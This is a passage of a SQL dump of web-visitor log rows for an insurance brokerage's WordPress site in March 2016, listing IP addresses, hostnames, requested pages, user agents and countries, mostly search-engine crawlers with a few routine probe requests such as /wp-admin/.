+http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(7554,'0b_7034dfbb1354da486cb044f9579ac479','1458592313','178.255.215.70','crawl06.exabot.com','/comments/feed/','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(7557,'0b_7034dfbb1354da486cb044f9579ac479','1458592316','178.255.215.70','crawl06.exabot.com','/members/feed/','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(7560,'0b_7034dfbb1354da486cb044f9579ac479','1458592319','178.255.215.70','crawl06.exabot.com','/members/','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(7562,'0b_bda54b744169f6b2f6c8825d88450574','1458593103','47.17.231.64','ool-2f11e740.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win8','Chrome 49','us','1920 x 1080','Google','','','','','0','0',0),(7563,'0b_bda54b744169f6b2f6c8825d88450574','1458593123','47.17.231.64','ool-2f11e740.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(7566,'0b_bda54b744169f6b2f6c8825d88450574','1458593125','47.17.231.64','ool-2f11e740.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win8','Chrome 49','us','1920 x 1080','Google','','','','','0','0',0),(7569,'0b_bda54b744169f6b2f6c8825d88450574','1458593126','47.17.231.64','ool-2f11e740.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(7572,'0b_bda54b744169f6b2f6c8825d88450574','1458593138','47.17.231.64','ool-2f11e740.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(7574,'0b_bda54b744169f6b2f6c8825d88450574','1458593252','47.17.231.64','ool-2f11e740.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(7577,'0b_bda54b744169f6b2f6c8825d88450574','1458593304','47.17.231.64','ool-2f11e740.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(7578,'0b_5aacdcbb49296b41f23e62bf621b350e','1458593467','66.249.73.178','crawl-66-249-73-178.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(7581,'0b_c151de09805cc21d075943d19552469b','1458599987','46.4.122.56','static.56.122.4.46.clients.your-server.de','/?author=1','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36','http://EMPIREINS.COM/?author=1','',0,'Win7','Chrome 31','ru','','','','','','','0','0',0),(7584,'0b_88f18689f545d7851a98224946d7f175','1458604717','66.249.73.187','crawl-66-249-73-187.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(7586,'0b_0f5f7bbf816f0eafbd1bd4a39ef4bca5','1458605770','207.46.13.148','msnbot-207-46-13-148.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7589,'0b_a4e6f25df51aac456f0a8da608f0c7ce','1458609967','74.197.48.4','c74-197-48-4.dh.suddenlink.net','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win10','Chrome 49','us','','','','','','','0','0',0),(7590,'0b_a4e6f25df51aac456f0a8da608f0c7ce','1458609968','74.197.48.4','c74-197-48-4.dh.suddenlink.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','','','','','','','0','0',0),(7592,'0b_9bf344e093f3e1eafb7b1413115652ce','1458611802','52.4.244.57','ec2-52-4-244-57.compute-1.amazonaws.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.65 Safari/537.31','','',0,'MacOSX','Chrome 26','','','','','','','','0','0',0),(7595,'0b_f9e22c5705fb01e7edc888a10c4019b1','1458611802','52.71.64.37','ec2-52-71-64-37.compute-1.amazonaws.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.65 Safari/537.31','','',0,'MacOSX','Chrome 26','','','','','','','','0','0',0),(7598,'0b_38343cad52478d289d41ee111e828b32','1458612353','66.87.117.246','66-87-117-246.pools.spcsdns.net','/','Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D20 Safari/601.1','','',0,'iPhone OS','Safari 9 Mobile','us','320 x 568','','','','','','0','0',0),(7601,'0b_38343cad52478d289d41ee111e828b32','1458612354','66.87.117.246','66-87-117-246.pools.spcsdns.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D20 Safari/601.1','','',0,'iPhone OS','Safari 9 Mobile','us','320 x 568','','','','','','0','0',0),(7604,'0b_2b0e39d32af42e3de53ab037db2ed059','1458616597','66.249.73.202','crawl-66-249-73-202.googlebot.com','/calc.html','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(7605,'0b_de9fff3e0b7db4ce877b626a2b454820','1458616598','66.249.73.169','crawl-66-249-73-169.googlebot.com','/calc.html','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(7607,'0b_474531d3cfe615dc79f8739c1db31c68','1458621129','100.43.81.152','spider-100-43-81-152.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(7610,'0b_bf406576002e43d314925c4df85416ed','1458622549','68.180.229.91','b115355.yse.yahoo.net','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(7611,'0b_e7ab87c2b6bab2db0442358e6783c207','1458624130','207.46.13.94','msnbot-207-46-13-94.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7613,'0b_26f3f5b289d9768aeeb818090412c3bb','1458625078','46.4.153.245','static.245.153.4.46.clients.your-server.de','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','http://empireins.com/','',0,'WinXP','IE 6','de','','','','','','','0','0',0),(7614,'0b_23095d5db2ef15bb0eab55f2fe44244b','1458631458','141.8.143.235','spider-141-8-143-235.yandex.com','/?p=309','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(7617,'0b_23095d5db2ef15bb0eab55f2fe44244b','1458631459','141.8.143.235','spider-141-8-143-235.yandex.com','/term-quotes/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(7619,'0b_492f8059bb09cf4b454ef168f2218ba7','1458633883','100.43.91.1','spider-100-43-91-1.yandex.com','/?p=171','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(7620,'0b_492f8059bb09cf4b454ef168f2218ba7','1458633884','100.43.91.1','spider-100-43-91-1.yandex.com','/members/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(7623,'0b_e593f071600d9affab0c028ec61dec67','1458633968','76.164.234.50','76.164.234.50','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:15.0) Gecko/20121011 Firefox/15.0.1','','',0,'WinXP','Firefox 15','ua','','','','','','','0','0',0),(7626,'0b_4a0e28ee8edcc73ccdef1c6b1feca3dc','1458634562','52.73.200.208','ec2-52-73-200-208.compute-1.amazonaws.com','/','python-requests/2.9.1','','',0,'','','','','','python','','','','0','0',0),(7628,'0b_1a3bddcaaf3d031bdb5351d68d0493ea','1458638086','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(7631,'0b_7153aa7185ceca701b98995d42f0fa72','1458639356','157.55.39.48','msnbot-157-55-39-48.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7634,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640408','31.204.128.94','hosted-by-i3d.net','/robots.txt','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7635,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640409','31.204.128.94','hosted-by-i3d.net','/','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7637,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640412','31.204.128.94','hosted-by-i3d.net','/about-us/','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7640,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640413','31.204.128.94','hosted-by-i3d.net','/forms/','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7643,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640417','31.204.128.94','hosted-by-i3d.net','/case-status/','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7644,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640418','31.204.128.94','hosted-by-i3d.net','/igo/','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7646,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640419','31.204.128.94','hosted-by-i3d.net','/members/','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7647,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640421','31.204.128.94','hosted-by-i3d.net','/meet-the-eib-team/','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7649,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640422','31.204.128.94','hosted-by-i3d.net','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7652,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640423','31.204.128.94','hosted-by-i3d.net','/SSO/235_19.html','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7655,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640427','31.204.128.94','hosted-by-i3d.net','/feed/','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7656,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640428','31.204.128.94','hosted-by-i3d.net','/comments/feed/','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7658,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640430','31.204.128.94','hosted-by-i3d.net','/home/feed/','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7659,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640431','31.204.128.94','hosted-by-i3d.net','/agent-tools/','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7662,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640432','31.204.128.94','hosted-by-i3d.net','/register/','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7664,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640433','31.204.128.94','hosted-by-i3d.net','/insentives/','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7667,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640435','31.204.128.94','hosted-by-i3d.net','/licensing-contracting/','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7670,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640436','31.204.128.94','hosted-by-i3d.net','/carriers/','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7671,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640437','31.204.128.94','hosted-by-i3d.net','/contact/','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7673,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640439','31.204.128.94','hosted-by-i3d.net','/term-quotes/','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7674,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640440','31.204.128.94','hosted-by-i3d.net','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7676,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640441','31.204.128.94','hosted-by-i3d.net','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7677,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640443','31.204.128.94','hosted-by-i3d.net','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7680,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640444','31.204.128.94','hosted-by-i3d.net','/about-us/feed/','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7682,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640445','31.204.128.94','hosted-by-i3d.net','/?p=9','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7683,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640446','31.204.128.94','hosted-by-i3d.net','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7686,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640448','31.204.128.94','hosted-by-i3d.net','/?p=311','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7688,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640449','31.204.128.94','hosted-by-i3d.net','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7689,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640450','31.204.128.94','hosted-by-i3d.net','/?page_id=169','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7692,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640452','31.204.128.94','hosted-by-i3d.net','/licensing-contracting/feed/','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7695,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640453','31.204.128.94','hosted-by-i3d.net','/register/feed/','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7698,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640454','31.204.128.94','hosted-by-i3d.net','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/feed/','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7700,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640456','31.204.128.94','hosted-by-i3d.net','/carriers/feed/','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7703,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640457','31.204.128.94','hosted-by-i3d.net','/?p=290','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7704,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640458','31.204.128.94','hosted-by-i3d.net','/agent-tools/feed/','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7706,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640459','31.204.128.94','hosted-by-i3d.net','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/feed/','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7709,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640461','31.204.128.94','hosted-by-i3d.net','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/feed/','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7710,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640463','31.204.128.94','hosted-by-i3d.net','/contact/feed/','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7713,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640464','31.204.128.94','hosted-by-i3d.net','/igo/feed/','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7716,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640465','31.204.128.94','hosted-by-i3d.net','/members/feed/','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7718,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640466','31.204.128.94','hosted-by-i3d.net','/meet-the-eib-team/feed/','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7721,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640468','31.204.128.94','hosted-by-i3d.net','/aig-releases-new-term-rates-and-re-enters-ny/feed/','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7724,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640469','31.204.128.94','hosted-by-i3d.net','/term-quotes/feed/','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7727,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640470','31.204.128.94','hosted-by-i3d.net','/?p=306','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7730,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640471','31.204.128.94','hosted-by-i3d.net','/case-status/feed/','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7731,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640473','31.204.128.94','hosted-by-i3d.net','/?p=171','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7734,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640474','31.204.128.94','hosted-by-i3d.net','/?p=347','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7737,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640475','31.204.128.94','hosted-by-i3d.net','/?p=277','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7739,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640477','31.204.128.94','hosted-by-i3d.net','/?p=169','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7740,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640478','31.204.128.94','hosted-by-i3d.net','/?p=288','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7743,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640479','31.204.128.94','hosted-by-i3d.net','/?p=303','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7745,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640480','31.204.128.94','hosted-by-i3d.net','/?p=309','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7746,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640481','31.204.128.94','hosted-by-i3d.net','/?p=10','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7748,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640483','31.204.128.94','hosted-by-i3d.net','/?p=181','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7751,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640484','31.204.128.94','hosted-by-i3d.net','/?p=283','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7754,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640485','31.204.128.94','hosted-by-i3d.net','/?p=185','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7755,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640486','31.204.128.94','hosted-by-i3d.net','/?p=319','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7757,'0b_c2b8bc1005888b647eed08f92fe4fd2f','1458640487','31.204.128.94','hosted-by-i3d.net','/?p=8','Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)','','',0,'','','us','','','Unknown Spider','','','','3','0',0),(7758,'0b_b9304b8455264f5f4e340ad4bc54c292','1458642669','180.76.15.151','baiduspider-180-76-15-151.crawl.baidu.com','/robots.txt','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','','',0,'WinXP','Firefox 6','cn','','','Baiduspider','','','','0','0',0),(7761,'0b_ef39fe5208ebea233c0e96cfb04c389f','1458643444','195.154.204.117','195-154-204-117.rev.poneytelecom.eu','/tester25','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50','http://empireins.com','',0,'WinXP','Opera 8','eu','','','','','','','0','0',0),(7763,'0b_5ff28c9d8cdcd1d9357f72791a82c9c3','1458643470','208.115.111.66','208-115-111-66-reverse.wowrack.com','/members/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(7764,'0b_e9dabf00461333fc5500ebfabcf61529','1458644571','141.8.143.235','spider-141-8-143-235.yandex.com','/?p=311','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(7766,'0b_16beace6c39961fccf2933e37304f078','1458644574','100.43.81.152','spider-100-43-81-152.yandex.com','/forms/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(7769,'0b_4f5f12e2ca1c38250e441d45b4eed50a','1458646119','157.55.39.48','msnbot-157-55-39-48.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7770,'0b_4f5f12e2ca1c38250e441d45b4eed50a','1458646144','157.55.39.48','msnbot-157-55-39-48.search.msn.com','/products.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7773,'0b_26363ece7c8eb43c4d6d11361381310d','1458646866','195.154.204.117','195-154-204-117.rev.poneytelecom.eu','/tester25','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50','http://empireins.com','',0,'WinXP','Opera 8','eu','','','','','','','0','0',0),(7776,'0b_c68ee6589692c65b2ade9d882bee33d0','1458648202','100.43.81.152','spider-100-43-81-152.yandex.com','/SSO/235_19.html','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(7779,'0b_cf224c6c4c9aa81e9254bfed6d4943d9','1458648918','157.55.39.48','msnbot-157-55-39-48.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7782,'0b_5c92b0246d3b2aacf618e4d9985d3329','1458650844','151.80.31.102','photon002.ahrefs.com','/robots.txt','Mozilla/5.0 (compatible; AhrefsBot/5.0; 